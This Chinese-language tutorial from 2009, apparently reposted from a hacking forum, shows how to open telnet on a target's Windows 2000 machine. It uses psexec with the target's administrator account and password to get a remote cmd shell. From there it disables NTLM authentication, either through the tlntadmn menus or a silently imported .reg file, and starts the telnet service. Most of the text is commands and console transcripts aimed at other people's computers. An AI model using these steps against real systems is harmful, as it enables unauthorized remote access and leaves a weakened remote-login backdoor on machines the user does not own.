首页 电脑 电脑学堂 查看内容

快速开启对方windows 2000的telnet服务

2009-2-8 05:16 625 0

摘要: 工具:psexec.exe试验者:littleshrimp http://www.chinansl.com /条件:知道对方机器的管理员账号密码任意一个,使用psexe...
关键词: nbsp 一个 对方 机器 服务 telnet system remote psexec 选择

工具:psexec.exe试验者:littleshrimp http://www.chinansl.com /条件:知道对方机器的管理员账号密码任意一个,使用psexec.exe 工具开启对方机器的telnet 服务。实践通过。 现在在网上流行的开对方机器的telnet 服务的教程有这么两种:一、小榕的流光工具自带的一个工具系列:ntlm.exe runas.exe ……俺觉得繁琐无比:(没有轻视小榕的意思:”)觉得小榕能写一个程序修改注册表,不简单:”)二、.abu.写的一个快速开启对方机器的telnet 服务的一个教程。说是快,实际上不快:(需要操作对方机器的注册表,速度奇慢无比。也没有什么XX意思:”(三、俺自己写的一个开启对方机器telnet 服务的教程,呵呵~~不是流行的,---参考:)比较快的一种,呵呵~俺没有自夸,需要两个工具:psexec.exe、ntlm.exe。方法略:”)有更好的你难道不想用么:”)呵呵~~对上边的开启telnet 服务的教程,做了一点评论,个人意见,仅供参考。今天我讲的快速开启对方机器(win 2000)的telnet服务之需要一个工具即可。PSEXEC.EXE做一下介绍:C:\Tools\Pstools>psexec.exe PsExec v1.3 - execute processes remotelyCopyright (C) 2001 Mark Russinovichwww.sysinternals.com PsExec executes a program on a remote system, where remotely executed consoleapplications execute interactively. Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [arguments]     -u         Specifies optional user name for login to remote                computer.     -p         Specifies optional password for user name. If you omit this                you will be prompted to enter a hidden password.     -s         Run the remote process in the System account.     -i         Run the program so that it interacts with the desktop on the                remote system.     -c         Copy the specified program to the remote system for                execution. If you omit this option the application                must be in the system path on the remote system.     -f         Copy the specified program even if the file already                exists on the remote system.     -d         Don't wait for process to terminate (non-interactive).     program    Name of application to execute.     arguments  Arguments to pass (note that file paths must be                absolute paths on the target system). You can enclose applications that have spaces in their name withquotation marks e.g. psexec \\marklap "c:\long name app.exe".Input is only passed to the remote system when you press the enterkey, and typing Ctrl-C terminates the remote process. If you omit a user name the process will run in the context of youraccount on the remote system, but will not have access to networkresources (because it is impersonating). Specify a valid user namein the Domain\User syntax if the remote process requires accessto network resources or to run in a different account. Note thatthe password is transmitted in clear text to the remote system.C:\Tools\Pstools>英文的,什么你不懂英文??呵呵~自己还是慢慢摸索吧!!这里我们运用这个命令行的两个参数-u –p 介绍一下:-u 就是对方机器的管理员的账号 –p 就是对方管理员账号的密码,如果密码为空则没有 –p 这个选项。运行格式:psexec.exe \\对方机器的ip -u 对方机器的管理员账号 –p 对方机器的管理员账号密码 cmd (需要运行的程序)步骤命令行下:1、 psexec.exe \\ip -u administrator –p foolishman cmd2、 进入对方机器 一般是c:\winnt\system32\〉下执行 tlntadmn.exe –呵呵~~这个是个什么程序??Telnet 服务器管理!呵呵~~知道了??3、 可以了,你已经知道该如何做乐:)4、 EOF进入对方机器后方法2:还有一种方法就是写一个reg文件,修改ntlm的值为0或1在dos下 c:\>copy con reg.regWindows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]"NTLM"=dword:00000000^zc:\>regedit /s reg.reg 不出现确定窗口:")c:\>net start telnetOK开启对方的telnet服务了:")很简洁是不是:")方法1附上操作步骤:本机运行:D:\hack\>tlntadmn Microsoft (R) Windows 2000 (TM) (内部版本号 2195)Telnet Server Admin (Build 5.00.99201.1) 请在下列选项中选择一个: 0) 退出这个应用程序1) 列出当前用户2) 结束一个用户的会话 ...3) 显示 / 更改注册表设置 ...4) 开始服务5) 停止服务 请键入一个选项的号码 [0 - 5] 以选择该选项: 3 请在下列选项中选择一个: 0) 退出这个菜单1) AllowTrustedDomain2) AltKeyMapping3) DefaultDomain4) DefaultShell5) LoginScript6) MaxFailedLogins7) NTLM8) TelnetPort请键入一个选项的号码 [0 - 8] 以选择该选项: 7NTLM 的当前值 = 1您确实想更改这个值吗 ? [y/n]yNTLM [ 当前值  = 1; 可接受的值 0、1 或 2 ] :0您确实想将 NTLM 设置为 : 0 ? [y/n]y 只有当 Telnet 服务重新开始后设置才会生效 请在下列选项中选择一个: 0) 退出这个菜单1) AllowTrustedDomain2) AltKeyMapping3) DefaultDomain4) DefaultShell5) LoginScript6) MaxFailedLogins7) NTLM8) TelnetPort请键入一个选项的号码 [0 - 8] 以选择该选项: 0 请在下列选项中选择一个: 0) 退出这个应用程序1) 列出当前用户2) 结束一个用户的会话 ...3) 显示 / 更改注册表设置 ...4) 开始服务5) 停止服务 请键入一个选项的号码 [0 - 5] 以选择该选项: 4启动 Microsoft Telnet 服务 ...Microsoft Telnet 服务启动成功 请在下列选项中选择一个: 0) 退出这个应用程序1) 列出当前用户2) 结束一个用户的会话 ...3) 显示 / 更改注册表设置 ...4) 开始服务5) 停止服务 请键入一个选项的号码 [0 - 5] 以选择该选项: 0 ###############################################################################对方机器上运行:Microsoft Windows 2000 [Version 5.00.2195](C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>tlntadmn=>回车!运行telnet管理器,但并不显示菜单:(3<=键入 回车------------------------1) AllowTrustedDomain2) AltKeyMapping3) DefaultDomain4) DefaultShell5) LoginScript6) MaxFailedLogins7) NTLM8) TelnetPort------------------------出现的菜单~~7<=键入 回车y<=键入 回车NTLM0<=键入(0)NTLM不是输入的 回车 y<=键入 回车---------------------1) AllowTrustedDomain2) AltKeyMapping3) DefaultDomain4) DefaultShell5) LoginScript6) MaxFailedLogins7) NTLM8) TelnetPort---------------------修改NTLM以后出现菜单0<=键入 回车 退出这个菜单4<=键入 回车 打开telnet服务<=>net start telnet0<=键入 回车 退出telnet管理器 C:\WINNT\system32>OK 已经开启了对方机器的 telnet 服务  
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部